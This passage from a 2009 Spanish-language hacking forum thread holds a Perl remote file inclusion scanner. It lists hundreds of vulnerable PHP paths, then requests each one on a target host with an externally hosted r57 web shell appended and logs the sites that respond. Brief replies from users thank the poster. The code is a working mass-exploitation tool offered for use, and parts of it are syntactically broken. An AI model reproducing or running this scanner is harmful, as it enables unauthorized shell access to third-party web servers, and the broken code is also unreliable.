$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnerable..\n";
}}
}
}
|
|
#5
17-Sep-2009, 21:01
|
|||
|
|||
|
aportazo.. se agradece..
Saludos! |
|
#6
17-Sep-2009, 22:20
|
|||
|
|||
|
quien t pide por msn q busqen paneles de admin?
|
![Enviar un mensaje por MSN a [xr4t3]](http://www.elcachondeo.cl/foro/images/styles/ec4/misc/im_msn.gif)
|
#7
17-Sep-2009, 23:07
|
|||
|
|||
|
Cita:
.mejor no preguntes ahahgajaha ya saludos man y prueba con estos pl .
|
|
#8
17-Sep-2009, 23:32
|
|||
|
|||
|
buena wn lo veremos
|
|
| Tags: matzhkr, perl |
| Herramientas | |
|
|
|
|
Anuncios Comunidad
Nueva herramienta: "Me Gusta"...Todas las horas son GMT -4. La hora es 04:55.
Quienes Somos | Condiciones de Uso | Publicidad | Contactenos
ElCachondeo.cl 2005-2010 ® Algunos derechos reservados - Idea y creación por Matías ConCha
Usando vBulletin, Copyright ©2000 - 2010, Jelsoft Enterprises Ltd - Archivo
